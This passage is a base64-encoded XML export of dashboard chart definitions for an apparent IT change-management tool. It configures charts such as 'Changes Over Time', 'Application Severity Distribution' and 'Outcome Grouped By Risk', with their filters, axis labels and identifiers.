HRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+Q0hBTkdFX09WRVJfVElNRV9EQVRBX1NPVVJDRTwvaWQ+PG5hbWU+Q2hhbmdlcyBPdmVyIFRpbWU8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPkZpbHRlcjwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0PkZpbHRlcjo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZS8+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+R3JvdXAgQnk6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4xPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjE8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+W3dlZWtdW1dlZWtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjwvQnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxjaGFydFRpdGxlPkNoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5DaGFuZ2VzPC9zZXJpZXNMYWJlbD48L0xpbmVDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkxpbmVDaGFydDwvdHlwZT48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48dXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TVEFUVVNfRElTVFJJQlVUSU9OPC9pZD48bmFtZT5CdXNpbmVzcyBDSSBTdGF0dXMgRGlzdHJpYnV0aW9uPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5Vc2VyIEFwcGxpY2F0aW9uczwvbmFtZT48dHlwZT55ZXNObzwvdHlwZT48cHJvbXB0PlNob3cgT25seSBVc2VyIEFwcGxpY2F0aW9uczwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltZXVtZZXNdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+ZWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5UaW1lIEZyYW1lPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+Q3JlYXRlZCBXaXRoaW48L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU3RhdHVzIERpc3RyaWJ1dGlvbjwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2UvPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlN0YXR1czwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5TdGF0dXM8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPkFwcGxpY2F0aW9uIFN0YXR1cyBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlsyOTQ5MThdW0xhdGVudF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5MYXRlbnQgQ2hhbmdlczwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjNiN2JiNmFhMDI5NzdmNWM6Njk0MDIxMGI6MTE2M2JjYjM5NGE6LTdmZGY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPk9VVENPTUVfR1JPVVBCWV9OVU1FUklDX0ZJRUxEX0RBVEFfU09VUkNFPC9pZD48bmFtZT5PdXRjb21lIEdyb3VwIGJ5IE51bWVyaWMgRmllbGQ8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPk1heGltdW0gVmFsdWU8L25hbWU+PHR5cGU+dGV4dDwvdHlwZT48cHJvbXB0Pk1heGltdW0gVmFsdWU6PC9wcm9tcHQ+PGxheW91dFJvdz4zPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+WzEwMF1bXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5NaW5pbXVuIFZhbHVlPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5NaW5pbXVuIFZhbHVlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MjwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlswXVtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkludGVydmFsPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5JbnRlcnZhbDo8L3Byb21wdD48bGF5b3V0Um93PjQ8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bMTBdW108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+TnVtZXJpYyBUeXBlPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+TnVtZXJpYyBUeXBlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltjYWxjdWxhdGVkLXJpc2tdW2NhbGN1bGF0ZWQtcmlza108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+T3V0Y29tZSBHcm91cCBCeSBSaXNrPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5Db2xvcjwvY29sb3JTb3VyY2U+PHRvb2x0aXBTb3VyY2U+VG9vbHRpcDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24+dmVydGljYWw8L29yaWVudGF0aW9uPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjxiYXJOYW1lU291cmNlPkZpZWxkPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+UmlzazwvYmFyQXhpc0xhYmVsPjx2YWx1ZVNvdXJjZT5QZXJjZW50YWdlPC92YWx1ZVNvdXJjZT48dmFsdWVBeGlzTGFiZWw+UGVyY2VudGFnZTwvdmFsdWVBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5PdXRjb21lPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPk91dGNvbWU8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPk91dGNvbWUgR3JvdXBlZCBCeSBSaXNrPC9uYW1lPjx1dWlkPjZhMzY3M2M5ZmViNzZkY2I6LTUxOTcwOGNjOjExNzJiYTU3OWVkOi03ZmYxPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TRVZFUklUWV9ESVNUUklCVVRJT048L2lkPjxuYW1lPkJ1c2luZXNzIENJIFNldmVyaXR5IERpc3RyaWJ1dGlvbjwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+VXNlciBBcHBsaWNhdGlvbnM8L25hbWU+PHR5cGU+eWVzTm88L3R5cGU+PHByb21wdD5TaG93IE9ubHkgVXNlciBBcHBsaWNhdGlvbnM8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bWV1bWWVzXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPmVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU2V2ZXJpdHkgRGlzdHJpYnV0aW9uPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5TZXZlcml0eSBDb2xvcnM8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlNldmVyaXR5PC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPlNldmVyaXR5PC9zZXJpZXNMYWJlbD48L011bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5DbHVzdGVyZWRCYXJDaGFydDwvdHlwZT48bmFtZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BQk5PUk1BTF9DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5BYm5vcm1hbCBDaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QWJub3JtYWwgQ2hhbmdlcyBPdmVyIFRpbWU8L2NoYXJ0VGl0bGU+PGNvbG9yU291cmNlLz48dG9vbHRpcFNvdXJjZT5Db3VudDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24vPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjx4QXhpc1NvdXJjZT5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc1NvdXJjZT48eEF4aXNMYWJlbD5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc0xhYmVsPjx5QXhpc1NvdXJjZT5Db3VudDwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+Q291bnQ8L